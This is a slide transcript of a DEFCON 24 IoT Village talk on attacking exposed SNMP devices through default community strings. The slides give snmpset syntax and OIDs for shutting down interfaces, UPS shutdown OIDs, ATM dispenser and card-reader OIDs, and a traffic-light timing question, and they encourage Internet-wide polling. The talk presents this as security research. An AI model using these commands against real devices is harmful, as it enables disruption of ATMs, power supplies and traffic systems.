DEFCON 24 IoT village - snmp remote attacks bertin bervis

Transcript

1. SNMP AND IOT DEVICES: LET ME MANAGE THAT FOR YOU

   BRO! Bertin Bervis Bonilla NetDB Project Co-Founder

2. Important Disclaimer You don´t need to do something illegal or

   stupid, you could be caught This research is for educational purposes My experience in a real scenario

3. Agenda -whoami -SNMP in 5 minutes … or more -OSINT

   /IoT Search engine NetDB -SNMP remote attacks DEMOS Conclusions/recommendations

4. It can only be attributable to human error

5. None

6. SNMP Packet Format

7. None

8. The Agent

9. So…WTF is a MIB?

10. None
11. None
12. None

13. Commands

14. Versions,settings,encryption

15. None

16. In a nutshell SNMP versions V1 V2 NO ENCRYPTION COMMUNITY

    STRINGS IN PLAIN TEXT USUALLY MANY VENDORS USES PUBLIC* FOR READ ONLY PRIVATE* FOR READ-WRITE

17. In a nutshell SNMP versions V3 FULL ENCRYPTION NOT OUR

    BUSSINES TODAY IN THIS TALK

18. It´s easy

19. The OID interface index 1.3.6.1.2.1.2.2.1.1 A unique value, greater than

    zero, for each interface. It is recommended that values are assigned contiguously starting from 1. The value for each interface sub-layer must remain constant at least from one re-initialization of the entity's network management system to the next re- initialization.
20. None

21. The OID ifAdminStatus 1.3.6.1.2.1.2.2.1.7 read-write properties1.3.

22. The OID ifAdminStatus 1.3.6.1.2.1.2.2.1.7. 4 Where number 4 is the

    interface index.

23. • The snmpset command is used to actually modify information

    on the remote host. For each variable you want to set, you need to specify the OID to update, the data type and the value you want to set it to. • The valid datatypes can be found at the end of the snmpset help output: • % snmpset -h |& tail -4 type - one of i, u, t, a, o, s, x, d, n i: INTEGER, u: unsigned INTEGER, t: TIMETICKS, a: IPADDRESS o: OBJID, s: STRING, x: HEX STRING, d: DECIMAL STRING U: unsigned int64, I: signed int64, F: float, D: double

24. The OID ifAdminStatus with SNMPSET 1.3.6.1.2.1.2.2.1.7. 4 i 1 Where

    number 4 is the interface index. And integer 1 is the value to turn off the interface 1 = ON 2 = OFF

25. So…. Let´s abuse the READ/WRITE properties using the PRIVATE community

    by default in all devices. POLL everything in the public Internet!!!!!!!!!!!

26. NetDB – The Network Database Project • Scan the ipv4/ipv6

    public address space • 24 hours • 70+ protocols • TCP/UDP • API • Probes for SNMP PRIVATE community strings • Sysname OID 1.3.6.1.2.1.1.5

27. DEMO

28. SNMP is everywhere in IoT After months of research we

    found : ATMs Cars Traffic lights systems Heavy Networking equipment Industrial equipment Medical devices SOHO Modems/Routers

29. CASE # 1 ATMs

30. "NCR Self-Service Terminal Hardware: x86 Family 15” iso.3.6.1.2.1.1.5.0 = STRING:

    "ATM041"

31. NCR interesting OIDs • CASH-01-SDCDISPENSER-SECONDCASSETTE-MIB 1.3.6.1.4.1.191.39.13.2.2.17.11 (secondCassette) • MCRW-01-SDCMOTORISED-CARDREADER-MIB 1.3.6.1.4.1.191.39.13.2.2.1.5

    (cardReader) • MCRW-01-SDCMOTORISED-CARDCAPTUREBIN-MIB 1.3.6.1.4.1.191.39.13.2.2.1.9 (cardCaptureBin)

32. CASE # 2 Industrial equipment

33. Taipei Metro System

34. None

35. CASE # 3 Traffic light systems

36. DEMO

37. Econolite ASC/3 SNMP/NTCIP

38. NTCIP National Transportation Communications for Intelligent Transportation

39. None

40. So….. We can set the Min green?

41. CASE # 4 3000+ watts power supplies /UPS

42. 1.3.6.1.2.1.33.1.1.2.0 In order to get the system version

43. But.. In this scenario you can turn off the whole

    device • UPS-MIB • upsShutdownAfterDelay 1.3.6.1.2.1.33.1.8.2 • upsStartupAfterDelay 1.3.6.1.2.1.33.1.8.3 • upsRebootWithDuration 1.3.6.1.2.1.33.1.8.4 • upsShutdownType 1.3.6.1.2.1.33.1.8.1

44. CASE # 5 Cars.. Remote cars…

45. None

46. GX450

47. DEMO

48. CASE # 6 Heavy networking equipment

49. Cisco and Huawei use the same OIDs

50. SNMP Killer DEMO Password extraction

51. Thanks !! See you next time !!!!